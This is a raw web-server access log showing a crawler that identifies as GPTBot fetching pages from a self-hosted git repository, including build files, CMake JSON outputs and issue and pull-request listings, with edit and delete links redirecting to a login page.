"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:19:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 11095] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:19:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12873] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:20 +0000] - 200 200 - GET https 